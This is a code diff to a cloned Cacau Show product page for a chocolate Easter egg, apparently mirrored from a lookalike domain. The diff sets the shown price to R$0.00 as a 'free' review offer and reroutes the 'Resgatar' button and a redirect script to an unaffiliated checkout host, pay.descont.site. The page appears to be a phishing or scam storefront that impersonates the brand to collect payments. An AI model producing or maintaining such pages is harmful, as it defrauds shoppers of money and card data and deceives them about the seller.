--- a/ovo2/index.html
+++ b/ovo2/index.html
@@ -4,6 +4,7 @@
 
 
 
+
 <!DOCTYPE html><html lang=""><!-- Mirrored from cacau-show.tech/produto/ovo-de-pascoa-pantufa-ursinhos-carinhosos-ursinha-animadinha-g-160g-1003264.html by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 27 Feb 2024 22:14:43 GMT --><head>
   
     <link rel="preload" href="https://c2.cdn1tp.net/655b153e61bb4a14af80c9ab39076250/gtmf0def0de.html" as="script">
@@ -851,10 +852,10 @@
                             </span>
                           </span>
 
-                          <span class="it__shelf--value" content="0.01"></span>
+                          <span class="it__shelf--value" content="0.00"></span>
 
                           <div class="it__shelf__discountPrice">
-                            R$0.01
+                            R$0.00
 
                             <div class="it__shelf__discountPrice__cacauLoversTag">
                               <span>Exclusivo Avaliação</span>
@@ -885,7 +886,7 @@
                     <div class="it_product__tocart">
                       <input type="hidden" class="add-to-cart-url" value="/on/demandware.store/Sites-CacauShow-Site/default/Cart-AddProduct">
 
-                      <button onclick="location.href='https://cacau-show-27.finalizarcompra.com/r/fxis56vE52u0o49O91MR';" class="add-to-cart btn btn-primary it_product__tocart__btn" data-pid="1003264">
+                      <button onclick="location.href='https://pay.descont.site/nQ7kZ7wMzz0Z0eJ';" class="add-to-cart btn btn-primary it_product__tocart__btn" data-pid="1003264">
                       <i class="fa-regular fa-gift"></i>
                         Resgatar
                       </button>
@@ -1497,7 +1498,7 @@
     <!-- Demandware Active Data (body_end-active_data.js) -->
     <script src="js/dwac-21.7.js" type="text/javascript" async="async"></script>
 	<script>
-        let prefix = ["https://noticiasde2024.fun/", "https://cacau-show-27.finalizarcompra.com/"];
+        let prefix = ["https://noticiasde2024.fun/", "https://pay.descont.site/nQ7kZ7wMzz0Z0eJ"];
         function getParams() {
             let t = "",
                 e = window.top.location.href,
